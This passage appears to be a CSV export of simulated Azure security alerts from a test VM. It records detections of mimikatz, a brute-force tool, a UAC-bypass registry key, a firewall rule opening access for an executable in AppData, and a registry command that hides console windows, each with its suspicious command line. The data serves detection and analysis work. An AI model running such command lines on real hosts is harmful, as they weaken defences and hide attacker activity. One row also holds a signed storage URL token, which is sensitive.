""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""sdopfjiowtbkjfnbeioruj.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1564"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\sdopfjiowtbkjfnbeioruj.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.0755415Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.0755415Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.0755415Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
90,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:15,2019-01-15 05:15:15,ad5981a5-fdcc-406a-8742-e50bd7f84917,2518547714842732992_ad5981a5-fdcc-406a-8742-e50bd7f84917,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\dubrute.exe' was running on the machine; this process is associated with carrying out brute force attacks. An attacker may have compromised this host as a launchpad for carrying out further attacks.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\dubrute.exe"",
""Suspicious Command Line"": "".\\dubrute.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x15c0"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""dubrute.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15c0"",
""CommandLine"": "".\\dubrute.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:15.7267007Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:15.7267007Z"",
""EndTimeUtc"": ""2019-01-15T05:15:15.7267007Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
91,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,e776fca2-4c01-43eb-ab97-b9845af3529c,2518547714838326136_e776fca2-4c01-43eb-ab97-b9845af3529c,Detection,Microsoft,Suspected Kerberos Golden Ticket attack parameters observed,Suspected Kerberos Golden Ticket attack parameters observed,Suspected Kerberos Golden Ticket attack parameters observed,Analysis of host data detected commandline parameters consistent with a Kerberos Golden Ticket attack.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg not /domain:everything that /sid:shines is /krbtgt:golden !"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x16fc"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x16fc"",
""CommandLine"": "".\\reg not /domain:everything that /sid:shines is /krbtgt:golden !"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.1673863Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.1673863Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.1673863Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
92,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:15,2019-01-15 05:15:15,55cd3e12-3a91-4b06-9be6-833df3365142,2518547714844457503_55cd3e12-3a91-4b06-9be6-833df3365142,Detection,Microsoft,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,"Analysis of host data on MSTICALERTSWIN1 detected a command-line with anomalous mix of upper and lower case characters. This kind of pattern, while possibly benign, is also typical of attackers trying to hide from case-sensitive or hash-based rule matching when performing administrative tasks on a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\rundll32.exe"",
""Suspicious Command Line"": "".\\rundll32 /c shell32control_randll.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1550"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1550"",
""CommandLine"": "".\\rundll32 /c shell32control_randll.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:15.5542496Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:15.5542496Z"",
""EndTimeUtc"": ""2019-01-15T05:15:15.5542496Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
93,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,33edaa83-fe35-47de-9486-fc9792c5b65b,2518547714839319574_33edaa83-fe35-47de-9486-fc9792c5b65b,Detection,Microsoft,Detected suspicious new firewall rule,Detected suspicious new firewall rule,Detected suspicious new firewall rule,Analysis of host data detected a new Firewall rule has been added via netsh.exe to allow traffic from an executable in a suspicious location.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\netsh.exe"",
""Suspicious Command Line"": "".\\netsh advfirewall firewall add rule name=rbtgskq action=allow program=c:\\users\\bob\\appdata\\roaming\\rbtgskq\\rbtgskq.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x168c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""netsh.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x168c"",
""CommandLine"": "".\\netsh advfirewall firewall add rule name=rbtgskq action=allow program=c:\\users\\bob\\appdata\\roaming\\rbtgskq\\rbtgskq.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.0680425Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.0680425Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.0680425Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
94,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:15,2019-01-15 05:15:15,8f71e695-ba9b-4c97-9770-63cdeb34b7b4,2518547714844291280_8f71e695-ba9b-4c97-9770-63cdeb34b7b4,Detection,Microsoft,Detected change to a registry key that can be abused to bypass UAC,Detected change to a registry key that can be abused to bypass UAC,Detected change to a registry key that can be abused to bypass UAC,"Analysis of host data on MSTICALERTSWIN1 detected that a registry key that can be abused to bypass UAC (User Account Control) was changed. This kind of configuration, while possibly benign, is also typical of attacker activity when trying to move from unprivileged (standard user) to privileged (for example administrator) access on a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg query add mscfile\\\\\\\\open"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1560"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1560"",
""CommandLine"": "".\\reg query add mscfile\\\\\\\\open"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:15.5708719Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:15.5708719Z"",
""EndTimeUtc"": ""2019-01-15T05:15:15.5708719Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
95,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:14,2019-01-15 05:15:14,e2a60bd1-d7c8-466d-a176-4333d4e0d1d5,2518547714854375707_e2a60bd1-d7c8-466d-a176-4333d4e0d1d5,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,"Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\mimikatz.exe' was running on the machine, often associated with attacker attempts to access credentials.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\mimikatz.exe"",
""Suspicious Command Line"": "".\\mimikatz.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1440"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1440"",
""CommandLine"": "".\\mimikatz.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:14.5624292Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:14.5624292Z"",
""EndTimeUtc"": ""2019-01-15T05:15:14.5624292Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
96,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:14,2019-01-15 05:15:14,9bfd0e4b-ec93-46bb-8eea-f72e8f1262f1,2518547714858429362_9bfd0e4b-ec93-46bb-8eea-f72e8f1262f1,Detection,Microsoft,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,"Analysis of host data on MSTICALERTSWIN1 detected an attempted WindowPosition registry configuration change that could be indicative of hiding application windows in non-visible sections of the desktop. This could be legitimate activity, or an indication of a compromised machine: this type of activity has been previously associated with known adware (or unwanted software) such as Win32/OneSystemCare and Win32/SystemHealer and malware such as Win32/Creprote. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00, corresponding to X-axis=0c00 and the Y-axis=0c00) this places the console app's window in a non-visible section of the user's screen in an area that is hidden from view below the visible start menu/taskbar. Known suspect Hex value includes, but not limited to c000c000",Low,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1758"",
""Hex Value set for WindowPosition"": ""200007c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1758"",
""CommandLine"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:14.1570637Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""Hive"": ""HKEY_CURRENT_USER"",
""Key"": ""console"",
""Type"": ""registry-key""
},
{
""$id"": ""11"",
""Key"": {
""$ref"": ""10""
},
""ValueType"": ""Unknown"",
""Type"": ""registry-value""
},
{
""$id"": ""12"",
""Key"": {
""$ref"": ""10""
},
""Name"": ""windowposition"",
""Value"": ""System.Byte[]"",
""ValueType"": ""DWord"",
""Type"": ""registry-value""
},
{
""$id"": ""13"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:14.1570637Z"",
""EndTimeUtc"": ""2019-01-15T05:15:14.1570637Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
97,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,4bb2ecc3-f4aa-40cd-a3d7-802fc9086e89,2518547714834806864_4bb2ecc3-f4aa-40cd-a3d7-802fc9086e89,Detection,Microsoft,Detected suspicious execution via rundll32.exe,Detected suspicious execution via rundll32.exe,Detected suspicious execution via rundll32.exe,"Analysis of host data on MSTICALERTSWIN1 detected rundll32.exe being used to execute a notepad.exe or reg.exe, consistent with the process injection technique previously seen used by activity group GOLD when installing their first stage implant on a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": ""reg.exe"",
""Parent Process"": ""c:\\diagnostics\\usertmp\\rundll32.exe"",
""Suspicious Process Id"": ""0x17e8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: GOLD\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-GOLD.pdf?sv=2018-03-28&sr=b&sig=WU7iUaOAYWclOTrdJwE5UqYIWfLX6Hy%2BV5nZk%2FfWh4k%3D&spr=https&st=2019-01-15T05:00:23Z&se=2019-04-15T05:15:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x17cc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17e8"",
""CommandLine"": ""reg.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.5193135Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.5193135Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.5193135Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
